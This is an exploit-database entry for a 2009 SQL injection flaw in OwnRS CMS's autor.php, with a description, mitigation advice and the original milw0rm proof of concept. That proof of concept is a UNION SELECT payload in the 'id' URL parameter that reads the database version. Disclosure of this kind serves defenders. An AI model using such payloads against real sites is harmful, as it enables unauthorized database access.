header-logo
Suggest Exploit
vendor:
CMS
by:
nuclear
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

OwnRS CMS (autor.php) SQL Injection Vulnerability

OwnRS CMS is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to the database and execute arbitrary SQL commands. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'autor.php' script.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL commands that are passed to the database. Additionally, the application should use parameterized queries to prevent SQL injection.
Source

Exploit-DB raw data:

#OwnRS CMS (autor.php) SQL Injection Vulnerability


#Author: nuclear


#download:
http://sourceforge.net/project/showfiles.php?group_id=230742


#vuln:
http://localhost/[path]/autor.php?id=' union select 1,2,3,4,5,@@version,7,8,9 '


#required:
magic_quotes_gpc == off;


#greetz Mi4night, cAs, zYzTeM, THE_MAN, Pepe, I-O-W-A,Digitalfortress, DiGitalX, sys32-hack, sys32r, Whitestar 

# milw0rm.com [2009-01-22]